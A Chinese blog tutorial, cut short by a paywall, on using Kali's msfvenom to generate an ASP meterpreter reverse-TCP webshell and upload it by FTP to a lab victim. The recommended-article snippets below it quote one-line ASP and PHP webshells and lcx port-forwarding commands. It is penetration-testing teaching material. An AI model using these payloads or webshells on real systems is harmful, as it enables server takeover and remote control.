kali攻防第13章 Metasploit之生成webshell及应用

最新推荐文章于 2026-06-18 10:33:13 发布
原创 最新推荐文章于 2026-06-18 10:33:13 发布 · 置顶 · 6.5k 阅读 · 9

Metasploit之生成webshell及应用

 

准备工具

1、kali 系统 IP 10.10.10.131

2、受害者机子 IP 10.10.10.130

3、使用工具 Metasploit

 

步骤:

 

1、在msf生成asp脚本木马

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

 

上传shell.asp到受害者机子

root@kali:~# ftp

ftp> open 10.10.10.130

Connected to 10.10.10.130.

220 Microsoft FTP Service

Name (10.10.10.130:root): administrator

331&nb

最低0.47元/天 解锁文章
应急响应之Windows入侵排查
Jack_chao_的博客
04-09 863
windows应急响应
kali下的webshell工具-Weevely
@小张小张的博客
09-29 4477
kali下的webshell工具-Weevely weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。 Weevely工具使用Python语言编写,集生成木马与连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,支持图片与.htaccess两种绕过方式。生成的木马文件进行了base64加密处理。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透;
零基础学网安|Kali MSF Windows 攻防完整教程
Button12138的博客
05-12 417
全网超详细 Kali+MSF 完整攻防流程,包含生成实训载荷、链路配置、屏幕监听监控等实操步骤。仅作网络安全技术学习与攻防演练,请勿违规滥用,新手收藏慢慢学。
网络安全学习小结--kali基本工具、webshell、代码审计
Tauil的博客
08-09 2854
webshell连接工具:中国菜刀、Cknife、Altman、xise、Weevely、quasibot、Webshell-Sniper、蚁剑 antSword、冰蝎 Behinder、webacoo、哥斯拉 Godzilla、PhpSploit。两方连接通话命令,假定AB进行连接,A(1.1.1.1)为控制端,B(2.2.2.2)为受控端,前后不同即为开启顺序不同。漏洞脚本库,提权,shell获取等等。暴力遍历网站目录,获取网站结构。木马制作,后门连接shell。也有一句话木马,设定密码为。...
红队技术-父进程欺骗(T1134)
YJ_12340的博客
10-20 1748
攻击者广泛使用该技术进行检测规避,并增加了应急响应人员检测IoC的时间。针对许多过时的和未打补丁的EDR解决方案,可以使用此技术轻松规避检测。通过本文,告诉大家在组织中应该使用最新的EDR解决方案以及在可以捕捉此类技术的优质产品中使用智能检测功能的重要性。
Kali工具-webshell之weevely
明明见自己的专栏
03-29 1415
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
Metasploitwebshell提权
weixin_34318272的博客
05-03 346
Metasploitwebshell提权 本文所涉及的方法只能在已授权的机器上做测试。 首先建议一下到网上查查meterpreter的用法在看这篇文,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,...
零基础入门Kali Linux渗透测试:从环境搭建到实战靶场攻防
weixin_34357436的博客
06-17 397
渗透测试作为网络安全领域的核心实践方法,其本质是一套系统化的安全评估流程,旨在通过模拟攻击来发现和验证系统漏洞。理解其标准流程(如PTES)是掌握该技术的基础,这包括信息收集、威胁建模、漏洞分析、渗透攻击等关键阶段。在技术实现层面,Kali Linux作为集成了数百款安全工具的发行版,为渗透测试人员提供了开箱即用的强大平台,其价值在于将方法论与工具链高效结合。对于初学者而言,构建一个包含Kali攻击机和漏洞靶场(如Metasploitable 2、DVWA)的隔离虚拟机环境,是进行安全、合法练习的前提。通过
(2025最后一篇博客)Metasploit框架攻击Windows实例:三种渗透路径
Bruce_xiaowei的博客
12-31 1354
本文通过三种渗透路径演示了针对Windows系统的Metasploit攻击技术。实验环境配置了DVWA靶机(Windows 10)和Kali Linux攻击平台。首先通过Nmap扫描发现目标开放HTTP和MySQL服务,随后详细介绍了三种攻击方法:1)利用Web命令执行漏洞进行无文件攻击,通过web_delivery模块生成Python载荷;2)上传PHP WebShell建立反向连接;3)利用MySQL未授权访问漏洞进行渗透。文包含完整的操作步骤、命令参数说明及多语言Payload示例,最后成功获取管理
Metasploitable2靶机攻防实战:从漏洞利用到防御加固的完整闭环
最新发布
anqiu4023的博客
06-18 376
在网络安全领域,漏洞利用与渗透测试是评估系统安全性的关键技术。其核心原理是通过模拟攻击者行为,发现并验证系统中存在的安全弱点,从而评估潜在风险。这项技术的价值在于能够主动识别威胁,为防御提供实证依据,是构建纵深防御体系的关键环节。在安全研究、渗透测试培训和系统加固等应用场景中,Metasploitable2作为经典的脆弱性靶机,集成了包括**Distcc后门**、**PHP CGI参数注入**在内的多种高危漏洞,为学习者提供了从信息搜集、漏洞利用、权限提升到横向移动的完整实战环境。通过对其漏洞机理的深度分析
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4501
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 1156
webacoo webshell其实就是放置在服务器上的一段代码 kali生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
【内网学习笔记】7、lcx、netcat和socat的使用
TeamsSix 的 CSDN 空间
05-28 923
1、lcx 使用 lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap Windows 内网端口转发 内网失陷主机 lcx.exe -slave rhost rport lhost lport 公网代理主机 lcx.exe -listen lport1 lport2 内网失陷主机 lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389 公网代理主机 lcx.exe -listen 4444 5555 在建立连接后,访问
使用Metasploit对Windows系统渗透测试——加壳免杀花指令
渗透测试
05-21 3346
目录前言一、生成被控端攻击载荷二、使用步骤1.引入库2.读入数据总结 前言 详细介绍了使用metasploit对windows系统进行渗透测试 测试环境 描述 IP地址 主机 kali 2020——msf6 192.168.1.113 靶机1 windows 10 1805 192.168.1. 靶机2 windows 7 x64 靶机3 windows xp sp3 一、生成被控端攻击载荷 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分
Metasploit(后渗透攻击:web后门)
qq_41453632的博客
12-10 5034
web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 1.meterpreter后门    在metasploit中,...
Kali自带的webshell客户端
Yale的博客
12-26 4771
0x01 第一个要介绍的是webacoo。 webacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
kali中的webshell生成工具weevely
k851819815的博客
02-21 1046
用法 usage: weevely [-h] {terminal,session,generate} ... 参数: {terminal,session,generate} terminal Run terminal or command on the target #在目标上运行终端或命令 session Recover an existing s...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2479
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
Kali渗透测试_WebShell
分享学习网络的点点滴滴
08-29 786
中国菜刀可能被IDS、AV、WAF、扫描器软件发现查杀。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

随行之旅

python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值